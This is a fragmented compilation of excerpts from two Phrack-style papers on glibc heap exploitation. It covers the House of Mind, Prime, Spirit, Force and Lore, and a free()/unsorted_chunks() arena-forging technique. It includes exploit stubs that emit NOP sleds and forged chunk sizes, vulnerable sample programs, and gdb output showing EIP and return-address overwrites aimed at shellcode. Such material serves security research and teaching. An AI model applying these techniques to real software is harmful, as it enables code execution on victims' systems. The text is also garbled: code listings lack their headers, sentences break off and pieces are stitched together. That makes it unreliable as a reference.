PREV_SIZE field is OK, the SIZE field is OK, but the 8 NOPs are trashed
with two memory addresses and 8 NULL bytes.
p->bk = bck;
p->fd = fwd;
It is clear that both pointers are overwritten with the addresses of the
chunks previous and next to our overflowed chunk "p".
[-----]
/*
* K-sPecial exploit modified by blackngel
*/
#include <stdio.h>
int i, j;
fwrite("\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90", 16, 1, stdout); /* NOPS */
return 0;
}
[-----]
We have succeeded! Up to this point, you could think that the first of the
conditions for The House of Mind (a piece of memory allocated at an address
like 0x08100000) seems impossible from a practical point of view.
Is that true?
[-----]
[...]
cp = arg;
[...]
p = xmalloc (sizeof (struct an_entry));
cp = xmalloc (strlen (arg) + 2); strcpy (cp, arg); p->next = entries;
p->entry = cp;
entries = p;
}
[-----]
As vl4d1m1r said, the heap layout will look something like this:
[an_entry][buffer][an_entry][buffer]...[Wilderness]
You can find this theory much better explained in the article "The Art of
Exploitation: Come on back to exploit" [10], published by vl4d1m1r of
Ac1dB1tch3z in Phrack 64.
The old exploit used the unlink() technique to accomplish its purpose. That
was for the glibc versions where this feature was not yet patched.
I'm not saying that The House of Mind is applicable to this vulnerability,
but rather that it meets certain conditions. It would be an exercise for
the more advanced reader.
[ Lotfi Zadeh ]
--------------------
---[ 4.1.1 ---[ FASTBIN METHOD ]---
--------------------
[-----]
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
if (__builtin_expect (*fb == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
printf("\nbDebug: p = 0x%x - fb = 0x%x\n", p, fb);
p->fd = *fb;
*fb = p;
}
[-----]
If we hack the "size" field of the overflowed chunk passed to free() and
set it to 8, "fastbin_index()" returns the following value:
(8 >> 3) - 2 = -1
Then:
&(av->fastbins[-1])
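This follows from how the index is computed; roughly, from glibc's
malloc.c:

/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz)  ((((unsigned int)(sz)) >> 3) - 2)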
In "*fb = p", the content of this address will be overwritten with the
address of the liberated chunk "p", which as before should must contain
a "JMP" sentence to reach the Shellcode.
Seen this, if you want to use ".dtors", you should make that "ar_ptr"
points to ".dtors" address in "public_free()", so that this address will
be the fakearena and "av->max_fast (av + 4)" will be equal to ".dtors +
4". Then it will be overwritten with the address of "p".
But to achieve this you have to walk a hard path. Let's see the conditions
that we must meet:
This is relatively the easiest one, because we said that the size will be
equal to "8" and "av->max_fast" will lie on a destructor entry. It should
be clear that in this case "DTORS_END" is not valid, because its value is
always "\x00\x00\x00\x00" and will never be greater than "size". It seems,
then, that the most effective option is to make use of the Global Offset
Table (GOT).
[-----]
[-----]
Here ends the theory presented in the two papers mentioned. But
unfortunately there is something that they forgot... at least something
that quite surprised me about K-sPecial's paper.
We learned from the previous attack that "av->mutex", which is the first
item of an "arena" structure, should be equal to 0. K-sPecial warned us
that otherwise "free()" would remain in an infinite loop...
You can find "0x00000000" four bytes behind .dtors, but overwriting
"0xffffffff" has no effect. And I do not think you can find 0x00000000
values between the entries of the GOT.
Solutions?
The main option would be to use the stack, as mentioned earlier. But the
difference is that we would need a prior buffer overflow allowing us to
overwrite EBP with 0 bytes, so that we have:
----------------
FINAL SOLUTION
----------------
But because we control the entire arena "av", we can afford a new analysis
of "fastbin_index()" for a size argument of 16 bytes:
(16 >> 3) - 2 = 0
If our vulnerable code is inside an fvuln() function, EBP and EIP will be
pushed onto the stack in the prologue; and what is there behind EBP? If
there is no user data, you can usually find a "0x00000000" value. If we use
"av->fastbins[0]" and not "av->max_fast", we have the following:
And we must control the "size" field of the next chunk so that it is
greater than "8" and less than "av->system_mem". If you look at the code
above you will note that this field is calculated from the offset of "p";
therefore this field lies virtually at "p + 0x15", an offset of 21 bytes.
But this value will fall in the middle of our NOP filler, and we must make
a small change to the "JMP" instruction in order to jump farther. Something
like 16 bytes will be sufficient.
[-----]
int fvuln()
{
// Make something stupid here.
}
fvuln();
...
[-----]
[-----]
/*
* FastBin Method - exploit
*/
#include <stdio.h>
int i, j;
fwrite("\x90\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x09\x00\x00\x00" \ /* nextchunk->size */
"\x90\x90\x90\x90", 20, 1, stdout);
return(0);
}
[-----]
[-----]
/* STACK DUMP */
(gdb) x/4x 0xbffff434 // av->max_fast // av->fastbins[0]
0xbffff434: 0x00000000 0xbffff518 0x0804ce52 0x080483ec
[-----]
The advantage of this method is that it does not touch the EBP register at
any time, and thus we can bypass some BoF protections.
It is also noteworthy that the two methods presented here for The House of
Mind are still applicable in the most recent versions of glibc; I have
checked it with the latest version, GLIBC 2.8.90.
This time we have arrived, walking with leaden feet and after a long
journey, at the end of The House of Mind.
[ XXX ]
-----------------------
---[ 4.1.2 ---[ av->top NIGHTMARE ]---
-----------------------
Once I had completed the study of The House of Mind, while tracking down a
little more code in search of other possible attack vectors, I found
something like this in _int_free():
[-----]
/*
If the chunk borders the current high end of memory,
consolidate into top
*/
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}
[-----]
At this point, EIP would be overwritten with the address of our overflowed
chunk "p". An arbitrary code execution could then be triggered.
if (nextchunk != av->top) {
...
}
This only happens when the chunk "p" that will be free()d is contiguous to
the highest chunk, the Wilderness.
At some point you might think that you control the value of av->top, but
remember that once you place av on the stack, control is handed to random
values in memory, and the current value of EIP will never be equal to
"nextchunk" unless a classic stack overflow is possible, in which case I
don't know why you are reading this article...
All I want to prove is that, for better or worse, all possible ways should
be examined carefully.
[ K. Jaspers ]
------------------------
---[ 4.2 ---[ THE HOUSE OF PRIME ]---
------------------------
Given everything seen to date, I do not want to dwell too much. The House
of Prime is, unquestionably, one of the most elaborate techniques in Malloc
Maleficarum. The result of a virtual adept.
To perform this technique, two calls to free() over two chunks of memory
under the designer's control are needed, plus one future call to
"malloc()".
The goal here, it should be clear, is not to overwrite some memory address
(even if that is necessary to complete the technique), but to make a call
to "malloc()" return an arbitrary memory address. Then, if we can control
this area, making it fall on the stack, we could take total control of the
application.
[-----]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
local_age = age;
strncpy(buffer, str1, sizeof(buffer)-1);
free(ptr1);
printf("\nEND free(1)\n");
free(ptr2);
printf("\nEND free(2)\n");
ptr3 = malloc(1024);
printf("\nEND malloc()\n");
strncpy(ptr3, str2, 1024-1);
return 0;
}
[-----]
Then:
fb = &(av->fastbins[-1]) = &av->max_fast;
In the last statement (*fb = p), av->max_fast will be overwritten with the
address of our chunk being free()'d.
The result is very evident: from that moment on, we can run the same piece
of code in free() whenever the size of the chunk passed to free() is less
than the value of the chunk address "p" previously free()'d.
To pass the integrity checks of the first free() call, we need these sizes:
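As a hedged reconstruction from the fastbin code being abused (this is not
the paper's original listing): the size field of the first chunk to be
free()d must be 8 (stored as 9 once PREV_INUSE is set), because
fastbin_index() then evaluates to -1 and "fb" lands exactly on av->max_fast:
[-----]
#define fastbin_index(sz)        ((((unsigned int)(sz)) >> 3) - 2)

/* in the fastbin path of free(), with size == 8:                   */
fb = &(av->fastbins[fastbin_index(size)]);   /* index (8>>3)-2 = -1 */
*fb = p;                                     /* av->max_fast = p    */
[-----]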
Taking Phantasmal's example, we would have to resize the second chunk
with the following value. The "size" field of the next chunk, whose
address is calculated from the value that we obtained a moment ago, is
checked again:
[-----]
putchar(0x41);
fwrite("\x19\x09\x00\x00", 4, 1, stdout); /* free(2) ptr2 size */
.... /* Later */
[-----]
This value will be used by the call to malloc(), which takes it as the
"arena" structure to use.
arena_get(ar_ptr, bytes);
if(!ar_ptr)
return 0;
victim = _int_malloc(ar_ptr, bytes);
.....
.....
"av" is now our arena, which starts at the beginning of the second chunk
liberated "p2", then it is clear that "av->max_fast" will be equal to the
"size" field of the chunk. In order to pass the first integrity check, we
have to ensure that the size requested by the "malloc()" call is less than
that value, as Phantasmal said, otherwise you can try the technique
described in 4.2.1.
Then we can see that "fb" is set to address of a "fastbin" in "av", and in
the following sentence, its content will be the final address of "victim".
Remember that our goal is to allocate an amount of bytes into a place of
our choice.
Well, that is where we need to copy repeatedly the address that we want
in the stack, so any return "fastbin" set our address in "fb".
Mmmmm, but wait a moment, the next condition is the most important:
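The check in question, roughly as it appears in the fastbin path of
_int_malloc() in the glibc versions discussed (the exact wording varies
between versions):
[-----]
if (__builtin_expect (fastbin_index (chunksize (victim))
                      != fastbin_index (nb), 0))
    malloc_printerr (check_action, "malloc(): memory corruption (fast)",
                     chunk2mem (victim));
[-----]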
This means that the "size" field of our fakechunk must be equal to the
amount requested by "malloc()". This is the last requirement in The House
of Prime. We must control a value into memory and place address of
"victim" just 4 bytes before, so this value would become its new size.
[-----]
END free(2)
[-----]
We are really close to EBP and EIP. What happens if our "name" is
composed of a few "A" letters?
[-----]
END free(2)
END malloc()
[-----]
Bingo! I think you can place your own shellcode now, right?
[-----]
check_inuse_chunk(av, p);
[-----]
[ Xavier Zubiri ]
-----------------------
---[ 4.2.1 ---[ unsorted_chunks() ]---
-----------------------
"av->bins[0]" and not its value, which means that we must devise another
method.
.....
victim = unsorted_chunks(av)->bk
bck = victim->bk;
.....
.....
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);
.....
victim = &av->bins[0]+4;
Perhaps by this clever route you can reach The House of Prime directly.
[ J. P. Sartre ]
-------------------------
---[ 4.3 ---[ THE HOUSE OF SPIRIT ]---
-------------------------
The House of Spirit is, undoubtedly, one of the simplest techniques to
apply when circumstances are propitious. The goal is to overwrite a
pointer that was previously returned by a call to "malloc()", so
that when it is passed to free(), an arbitrary address gets stored
in a "fastbin[]".
As a result, a future call to malloc() may take this value as the new
memory for the requested chunk. And what happens if I make this memory
chunk fall onto a specific area of the stack?
Well, if we can control what we write into it, we can change any value
that lies ahead of it. As always, this is where EIP enters the game.
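Before looking at the vulnerable example, here is a minimal stand-alone
sketch of the idea (an illustration of mine, assuming 32-bit x86 and a
pre-tcache glibc of this era; the array indices would differ on 64-bit):
[-----]
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    unsigned long fake[16];   /* the fake chunk lives on the stack        */
    void *p;

    fake[1]  = 0x30;          /* fake size: fits a fastbin and equals      */
                              /* request2size(0x28)                        */
    fake[13] = 0x40;          /* fake size of the *next* chunk: must be    */
                              /* sane (> 8 and < av->system_mem)           */

    p = malloc(0x28);         /* the pointer that would be overwritten     */
    p = (void *)&fake[2];     /* simulate the overwrite of that pointer    */
    free(p);                  /* &fake[0] is now linked into a fastbin     */

    p = malloc(0x28);         /* same request size -> returns the fake     */
    printf("malloc(0x28) = %p, &fake[2] = %p\n", p, (void *)&fake[2]);
    return 0;
}
[-----]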
[-----]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
local_age = age;
free(ptr1);
return 0;
}
[-----]
With this in mind, we can change the address of the chunk, but not all
addresses are valid. Remember that in order to execute the "fastbin" code
described in The House of Prime, we need a value smaller than
"av->max_fast" and, more specifically, as Phantasmal said, it has to be
equal to the size requested in the future call to "malloc()" + 8.
In our case we see that the value is just behind EBP, and PTR1 would have
to point to EBP. Remember that we are modifying the pointer to the memory
area, not the chunk's address.
... at $EBP - 4 + 48 we must have a value that meets the above conditions.
Otherwise you should look for other memory addresses that allow you to
control both values.
[-----]
(gdb) c
Continuing.
PTR1 = [ 0x80c2688 ]
PTR1 = [ 0xbffff318 ]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[-----]
In this special case, the address of EBP would be the address of PTR2's
data area, which means that the fourth write will overwrite EIP, and you
will be able to point it at your shellcode.
Now you can feel the power of witches. We have arrived, flying on a
broom, at The House of Spirit.
[ Federico Fellini ]
-------------------------
---[ 4.4 ---[ THE HOUSE OF FORCE ]---
-------------------------
The main goal of this technique is to reach the following piece of code
in "_int_malloc()":
[-----]
.....
use_top:
victim = av->top;
size = chunksize(victim);
[-----]
[-----]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
ptr1 = malloc(256);
printf("\nPTR1 = [ %p ]\n", ptr1);
strcpy(ptr1, str);
return 0;
}
[-----]
This ensures that any sufficiently large memory request is handled by
this code in "_int_malloc()", instead of expanding the heap.
victim = av->top;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
PTR1 = [ 0x80c2688 ]
As we can see, "remainder" is exactly the sum of this address plus the
number of bytes requested by "malloc ()". This amount must be controlled
by the designer as mentioned above.
Since that time, "av->top" contain our altered value, and any request that
triggers this piece of code, get this address as its data zone. Everything
that is written will destroy the stack.
....
void *p = chunk2mem(victim);
if (__builtin_expect (perturb_byte, 0))
alloc_perturb (p, bytes);
return p;
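As a concrete illustration of that arithmetic (a sketch of mine, assuming
a 32-bit system with an 8-byte chunk header and 8-byte alignment; the
addresses are hypothetical), this is how the malloc() argument that
relocates av->top just below a chosen target can be computed:
[-----]
#include <stdio.h>

/* after the top chunk size has been overflowed with a huge value,
 * request this many bytes so that av->top becomes target - 8 and the
 * *next* allocation is served at 'target' (minor alignment tweaks may
 * be needed) */
unsigned long evil_request(unsigned long top, unsigned long target)
{
    return target - top - 16;    /* == (target - 8) - top - 8 */
}

int main(void)
{
    unsigned long top    = 0x080c2690;   /* hypothetical current av->top */
    unsigned long target = 0xbffff4f0;   /* hypothetical address to own  */
    printf("malloc(%lu) moves av->top to 0x%lx\n",
           evil_request(top, target), target - 8);
    return 0;
}
[-----]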
Let's go:
[-----]
PTR1 = [ 0x80c2688 ]
[-----]
NOTE: As you have seen in the introduction of this article, g463 wrote a
paper about how to take advantage of the set_head() macro in order
to overwrite an arbitrary memory address. It is strongly recommended
that you read his work. He also presented brief research on The House
of Force...
Due to a serious error of mine, I did not read that article until
a Phrack member warned me of its existence after I had edited my
article. I cannot help feeling amazed at the level of skill these
people are reaching. The work of g463 is really smart.
.....
char buffer[64];
ptr2 = malloc(len);
ptr3 = calloc(1, 256);
done through the function "calloc()", and in this case we do not control
its content, but we do control a buffer declared at the beginning of the
vulnerable function.
But I soon realized that the alignment applied by the malloc() algorithm
when it is called thwarts this possibility. We could overwrite EBP
completely with "0"s, which is useless for our purposes. Besides, one must
always take care not to clobber our buffer[] with zeros if the memory
reservation happens after its content has been set by the user.
[ D. Ruiz Larrea ]
---------------
---[ 4.4.1 ---[ MISTAKES ]---
---------------
In fact, regarding what we did in the previous section, using the stack
was the only viable solution I found, after realizing some problems that
Phantasmal had not anticipated.
... we can see that both addresses are behind the address of "av->top",
and no amount we add can lead us to them. Function pointers, the BSS
region and other things are behind as well...
It is because of this that the Malloc Maleficarum did not mention that the
Nothing is impossible in this world, and I know that you can feel The
House of Force.
[ E. Galeano ]
-----------------------
---[ 4.5 ---[ THE HOUSE OF LORE ]---
-----------------------
But again I repeat what I said at the end of The House of Mind technique
(the CVS vulnerability). That same case is perfect for the conditions that
must be met in The House of Lore: we need multiple calls to malloc()
while controlling their sizes.
victim_index = smallbin_index(size);
fwd = bck->fd;
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
.....
if ( (victim = last(bin)) != bin) {
if (victim == 0) /* initialization check */
malloc_consolidate(av);
else {
bck = victim->bk;
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;
...
return chunk2mem(victim);
.....
In this technique, Phantasmal said that the ultimate goal was to overwrite
"bin->bk", but the first element that we can control is "victim->bk". As
far as I understand, we must ensure that the overflowed chunk passed
to "free()" sits in the position just before "last", so that "victim->bk"
points to its address, which we must control and which should point to the
stack. This address is passed to "bck" and then changes "bin->bk". Because
of this, we now control the "last" chunk with a designer-controlled address.
That is why we need a new call to "malloc()" with the same size as the
previous one, so that this value becomes the new "victim" and is returned in:
[-----]
___[chunk]_____[chunk]_____[chunk]____
| |
! bk bk |
[bin]----->[last=victim]----->[ ptr1 ]---/
^____________| ^_______________|
fwd ^ fwd
|
return chunk2mem(victim);
___[chunk]_____[chunk]_____[chunk]____
| |
! bk bk |
[bin]----->[ ptr1 ]--------->[ chunk ]---/
^___________| ^________________|
fwd ^ fwd
|
return chunk2mem(ptr1);
[-----]
One must be careful with the fact that "bck->fd" is also overwritten in
turn; on the stack this is not a big problem.
In theory, using a similar technique, a fake chunk could be placed in its
corresponding "bin", and a further call to "malloc()" could be triggered
that returns that same memory space.
#define NSMALLBINS 64
#define SMALLBIN_WIDTH MALLOC_ALIGNMENT
#define MIN_LARGE_SIZE (NSMALLBINS * SMALLBIN_WIDTH)
For "largebin" method will have to use larger chunks than this estimated
size.
Like all houses, it's only a way of playing, and The House of Lore,
although not very suitable for a credible case, no one can say that
is a complete exception...
[ V. R. Potter ]
------------------------------
---[ 4.6 ---[ THE HOUSE OF UNDERGROUND ]---
------------------------------
In this world all possibilities exist: the chance that something goes
well, and the chance that something goes wrong. In the world of
vulnerability exploitation this remains true. The problem is acquiring the
necessary skills to find these possibilities, usually the possibility that
something goes well.
For example... what about using The House of Mind and The House of Spirit
methods at the same time?
Consider that both have their own limitations. On the one hand, The House
of Mind needs, as has been said, a piece of memory at an address above
0x08100000, while The House of Spirit requires that, once the pointer to
be free()d has been overwritten, a new call to malloc() is made.
In The House of Mind, the main goal is to control the "arena" structure,
and this starts with the modification of the third least significant bit
of the size field of the overwritten chunk (P). But the fact that we can
modify this metadata does not mean that we control the address of this
chunk.
You may still investigate new avenues, but I cannot guarantee that they
will work.
public_fREe(Void_t* mem)
We can make it point to some place like the stack or the environment. It
should always be a memory location with data controlled by the user. Then
the effective address of the chunk would be obtained at:
p = mem2chunk(mem);
At this point we leave The House of Spirit to focus on The House of
Mind. Again we must control the arena "ar_ptr" and, to achieve this, the
size field of the chunk (at p + 4) should have the NON_MAIN_ARENA bit
enabled.
But that is not the most important thing here; the final question is:
could you put the chunk in a place such that you can then control the area
returned by "heap_for_ptr(ptr)->ar_ptr"?
But again, every avenue should be studied; you could find a new method,
and perhaps you will call it The House of Underground...
----------------------------------------
---[ 5 ---[ ASLR and Nonexec Heap (The Future) ]---
----------------------------------------
This way of working is not very reliable in the days we live in...
Regarding the first topic, we have a magical work, "Bypassing PaX ASLR
protection" [11] by Tyler Durden in Phrack 59.
Since I started my little research and the work of writing this article,
my goal has always been to leave this task as homework for the new hackers
who have the strength to continue down this path.
[ Confucio ]
-------------------------
---[ 6 ---[ THE HOUSE OF PHRACK ]---
-------------------------
This is just one path so that you can continue researching. There is a
world full of possibilities, and most of them are still undiscovered. Do
you want to be the next to find one?
As far as I understand, this means that all those who have written in
Phrack are childish, crackers, lower life forms, and are marked in the
hacker culture as losers.
Is there some connection between our name and our skills, our philosophy
of life or our ethics in hacking?
In my own opinion, if this is true, I am proud that Phrack admits lower
life forms into its ranks. Lower life forms that have helped to raise the
security level of the network of networks in unimaginable ways.
blackngel
----------------
---[ 7 ---[ REFERENCES ]---
----------------
4. Yet another free() exploitation technique - huku
|=-----------------------------------------------------------------------=|
|=-------------=[ Yet another free() exploitation technique ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ By huku ]=--------------=|
|=---------------=[ ]=--------------=|
|=---------------=[ huku <huku _at_ grhack _dot_ net ]=--------------=|
|=-----------------------------------------------------------------------=|
---[ Contents
I. Introduction
II. Brief history of glibc heap exploitation
III. Various facts regarding the glibc malloc() implementation
1. Chunk flags
2. Heaps, arenas and contiguity
3. The FIFO nature of the malloc() algorithm
4. The prev_size under our control
5. Debugging and options
IV. In depth analysis on free()'s vulnerable paths
1. Introduction
2. A trip to _int_free()
V. Controlling unsorted_chunks() return value
VI. Creating fake heap and arena headers
VII. Putting it all together
VIII. The ClamAV case
1. The bug
2. The exploit
IX. Epilogue
X. References
XI. Attachments
---[ I. Introduction
When articles [01] and [02] were released in Phrack 57, heap
exploitation techniques became common fashion. Various heap
exploits were, and still are, published on various security related
lists and sites. Since then, the glibc code, and especially malloc.c,
evolved dramatically, and eventually various heap protection schemes
were added just to make exploitation harder.
our technique.
The glibc versions revised during the analysis were 2.3.6, 2.4, 2.5
and 2.6 (the latest version at the time of writing). Version 2.3.6
was chosen due to the fact that glibc versions greater or equal to
2.3.5 include additional security precautions. Examples were not
tested on systems running glibc 2.2.x since it is considered quite
obsolete.
But enough about the past. Before entering a new chapter of the
malloc() history, the author would like to clarify a few details
regarding malloc() internals. It's actually the very basis of what
will follow.
Probably, you are already familiar with the layout of the malloc()
chunk header as well as with its 'size' and 'prev_size' fields.
What is usually overlooked is the fact that apart from PREV_INUSE,
the 'size' field may also contain two more flags, the IS_MMAPPED
and the NON_MAIN_ARENA, the latter being the most interesting one.
When the NON_MAIN_ARENA flag is set, it indicates that the chunk
is part of an independent mmap()'ed memory region.
...+----------+-----------+---------+-...-+---------+...
| Heap hdr | Arena hdr | Chunk_1 | | Chunk_n |
...+----------+-----------+---------+-...-+---------+...
#define heap_for_ptr(ptr) \
((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
--- snip ---
Notice that the arena header contains a field called 'flags'. The
3rd MSB of this integer indicates whether the arena is contiguous
or not. If not, certain contiguity checks during malloc() and free()
are ignored and never performed. By taking a closer look at the
heap header, one can also notice that a field named 'ar_ptr' also
exists, which of course, should point to the arena header of the
current heap. Since the arena header physically borders the heap
header, the 'ar_ptr' field can easily be calculated by adding the
size of the heap_info structure to the address of the heap itself.
#include <stdio.h>
#include <stdlib.h>

int main() {
void *a, *b, *c;
a = malloc(16);
b = malloc(16);
fprintf(stderr, "a = %p | b = %p\n", a, b);
a = realloc(a, 32);
fprintf(stderr, "a = %p | b = %p\n", a, b);
c = malloc(16);
fprintf(stderr, "a = %p | b = %p | c = %p\n", a, b, c);
free(a);
free(b);
free(c);
return 0;
}
This code will allocate two chunks of size 16. Then, the first chunk
is realloc()'ed to a size of 32 bytes. Since the first two chunks
are physically adjacent, there's not enough space to extend 'a'.
The allocator will return a new chunk which, physically, resides
somewhere after 'a'. Hence, a hole is left where 'a' used to be.
When the code requests a new chunk 'c' of size 16, the
allocator notices that a free chunk exists (actually, this is the
most recently free()'ed chunk) which can be used to satisfy the
request. The hole is returned to the user. Let's verify.
Indeed, chunk 'c' and the initial 'a', have the same address.
Last but not least, the signedness and size of the 'size' and
'prev_size' fields are totally configurable. You can change them
by resetting the INTERNAL_SIZE_T constant. Throughout this article,
the author used a x86 32bit system with a modified glibc, compiled
with the default options. For more info on the glibc compilation
for debugging purposes see [11], a great blog entry written by
Echothrust's Chariton Karamitas (hola dude!).
--[ 1. Introduction
Before getting into more details, the author would like to stress
the fact that the technique presented here requires that the attacker
is able to write null bytes. That is, this method targets read(),
recv(), memcpy(), bcopy() or similar functions. The str*cpy() family
of functions can only be exploited if certain conditions apply (e.g.
when decoding routines like base64 etc are used). This is, actually,
the only real life limitation that this technique faces.
buffer for each client. The attacker can force the daemon to allocate
contiguous buffers into the heap by repeatedly firing up connections
to the target host. This is an old technique used to stabilize the
heap state (e.g in openssl-too-open.c). Controlling the heap memory
allocation and freeing is a fundamental precondition required to
build any decent heap exploit after all.
Ok, let's start the actual analysis. Consider the following piece
of code.
if(argc != 3) {
fprintf(stderr, "%s <n> <size>\n", argv[0]);
return -1;
}
n = atoi(argv[1]);
size = atoi(argv[2]);
c1 = malloc(80);
fprintf(stderr, "[~] Chunk 1 at %p\n", c1);
c2 = malloc(80);
fprintf(stderr, "[~] Chunk 2 at %p\n", c2);
c3 = malloc(80);
fprintf(stderr, "[~] Chunk 3 at %p\n", c3);
c4 = malloc(80);
fprintf(stderr, "[~] Chunk 4 at %p\n", c4);
return 0;
}
--- snip ---
four contiguous chunks. Notice that the first one is under the
attacker's control. At (2) the code calls free() on the second
chunk, the one physically bordering the attacker's block. To see
what happens from there on, one has to delve into the glibc free()
internals.
When a user calls free() within the userspace, the wrapper __libc_free()
is called. This wrapper is actually the function public_fREe()
declared in malloc.c. Its job is to perform some basic sanity checks
and then control is passed to _int_free() which does the hard work
of actually freeing the chunk. The whole code of _int_free() consists
of an 'if', an 'else if' and an 'else' block, which handle chunks depending
on their properties. The 'if' part handles chunks that belong to
fast bins (i.e. whose size is less than 64 bytes), the 'else if'
part is the one analyzed here and the one that handles bigger chunks.
The last 'else' clause is used for very big chunks, those that were
actually allocated by mmap().
if(...) {
/* Handle chunks of size less than 64 bytes. */
}
else if(...) {
/* Handle bigger chunks. */
}
else {
/* Handle mmap()ed chunks. */
}
}
--- snip ---
One should actually be interested in the 'else if' part, which handles
chunks of size larger than 64 bytes. This means, of course, that
the exploitation method presented here works only for such chunk
sizes, but this is not much of an obstacle as most everyday
applications usually allocate chunks larger than this.
*/
nextchunk = chunk_at_offset(p, size);
...
...
--- snip ---
So, first _int_free() checks if the chunk being freed is the top
chunk. This is of course false, so the attacker can ignore this
test as well as the following three.
...
...
--- snip ---
...
...
/* (1) */
bck = unsorted_chunks(av);
fwd = bck->fd;
p->bk = bck;
p->fd = fwd;
/* The 'p' pointer is controlled by the attacker.
* It's the prev_size field of the second chunk
* which is accessible at the end of the usable
* area of the attacker's chunk.
*/
bck->fd = p;
fwd->bk = p;
...
...
}
--- snip ---
The 'M' and 'm' parameters of these macros refer to the arena where
a chunk belongs. A real life usage of unsorted_chunks() is briefly
shown below.
The arena for chunk 'p' is first looked up and then used in the
unsorted_chunks() macro. What is now really interesting is the way
the malloc() implementation finds the arena for a given chunk.
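For reference, the lookup described in the next paragraph is performed by
macros that look approximately like this in the glibc versions examined
here (double-check against your own tree):
--- snip ---
#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)

#define arena_for_chunk(ptr) \
    (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)
--- snip ---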
For a given chunk (like 'p' in the previous snippet), glibc checks
whether this chunk belongs to the main arena by looking at the
'size' field. If the NON_MAIN_ARENA flag is set, heap_for_ptr() is
called and the 'ar_ptr' field is returned. Since the attacker
controls the 'size' field of a chunk during an overflow condition,
she can set or unset this flag at will. But let's see what's the
return value of heap_for_ptr() for some sample chunk addresses.
--- snip ---
#include <stdio.h>
#include <stdlib.h>

#define HEAP_MAX_SIZE (1024 * 1024)  /* 1 Mbyte */
#define heap_for_ptr(ptr) \
((void *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))

int main(int argc, char *argv[]) {
    unsigned long i, n;

    if(argc != 2) {
        fprintf(stderr, "%s <n>\n", argv[0]);
        return -1;
    }
    n = strtoul(argv[1], NULL, 0);
    for(i = 0; i < n; i++)   /* reconstructed loop: sample addresses 1MB apart */
        printf("%p\n", heap_for_ptr(0x08048000UL + i * HEAP_MAX_SIZE));
    return 0;
}
--- snip ---
This code prints the first N heap addresses. So, for a chunk that
has an address of 0xdeadbeef, its heap location is at most 1Mbyte
backwards. Precisely, chunk 0xdeadbeef belongs to heap 0xdea00000.
So, if an attacker controls the memory at a chunk's theoretical
heap address, then by overflowing the 'size' field of this chunk,
they can fool free() into assuming that a valid heap header is stored
This is not a rare situation; in fact this is how most real life
heap exploits work. Forcing the target application to perform a
number of continuous allocations, helps the attacker control the
arena header. Since the heap is not randomized and the chunks are
sequentially allocated, the heap addresses are static and can be
used across all targets! Even if the target system is equipped with
the latest kernel and has heap randomization enabled, the heap
addresses can be easily brute forced since a potential attacker
only needs to know the upper part of an address rather than some
specific location in the virtual address space.
Notice that the code shown in the previous snippet always produces
the same results and precisely the ones depicted above. That is,
given the approximation of the address of some chunk one tries to
overflow, the heap address can be easily precalculated using
heap_for_ptr().
For example, suppose that the last chunk allocated by some application
is located at the address 0x080XXXXX. Suppose that this chunk belongs
to the main arena; but even if it didn't, its heap address would
be 0x080XXXXX & 0xfff00000 = 0x08000000. All one has to do is to
force the application to perform a number of allocations until the
target chunk lies beyond 0x08100000. Then, if the target chunk has
an address of 0x081XXXXX, by overflowing its 'size' field, one can
make free() assume that it belongs to some heap located at 0x08100000.
This area is controlled by the attacker who can place arbitrary
data there. When public_fREe() is called and sees that the heap
address for the chunk to be freed is 0x08100000, it will parse the
data there as if it were a valid arena. This will give the attacker
the chance to control the return value of unsorted_chunks().
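A quick stand-alone check of that precalculation (the chunk address below
is hypothetical):
--- snip ---
#include <stdio.h>

#define HEAP_MAX_SIZE (1024 * 1024)
#define heap_for_ptr(ptr) \
    ((void *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE - 1)))

int main(void)
{
    void *chunk = (void *)0x0812abcd;  /* hypothetical overflowed chunk */
    /* prints 0x8100000, the address free() will treat as the heap header */
    printf("chunk %p -> heap %p\n", chunk, heap_for_ptr(chunk));
    return 0;
}
--- snip ---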
Once an attacker controls the contents of the heap and arena headers,
what are they supposed to place there? Placing random arbitrary
values may result in the target application getting stuck by entering
endless loops or even segfaulting before its time, so, one should
be careful not to cause such side effects. In this section, we
deal with this problem. Proper values for various fields are shown
and an exploit for our example code is developed.
if(p != av->top) {
if(contiguous(av)) {
assert(((char*)p) >= min_address);
assert(((char*)p + sz) <= ((char*)(av->top)));
}
}
Since the attacker controls the arena flags, if they set it to some
integer having the third least significant bit set, then contiguous(av)
is false and the assert() checks are ignored. Additionally, providing
an 'av->top' pointer equal to the heap address, results in 'max_address'
and 'min_address' getting valid values, thus avoiding annoying
segfaults due to invalid pointer accesses. It seems that the first
set of problems was easily solved.
Do you think it's over? Hell no. After some lines of code are
executed, _int_free() uses the macro __builtin_expect() to check
whether the size of the chunk right next to the one being freed (the
third chunk) is larger than the total available memory of the arena.
This is a good measure for detecting overflows, and any decent
attacker has to find a way around it.
mutex_lock(&ar_ptr->mutex);
++(ar_ptr->stat_lock_wait);
}
#else
mutex_lock(&ar_ptr->mutex);
#endif
--- snip ---
Right now there are no more restrictions; we can just place the
value 0x08100020 (the heap header offset plus the heap header size)
in the 'ar_ptr' field of the _heap_info structure, and give the
value retloc-12 to bins[0] (where retloc is the return location
where the return address will be written). Recall that the return
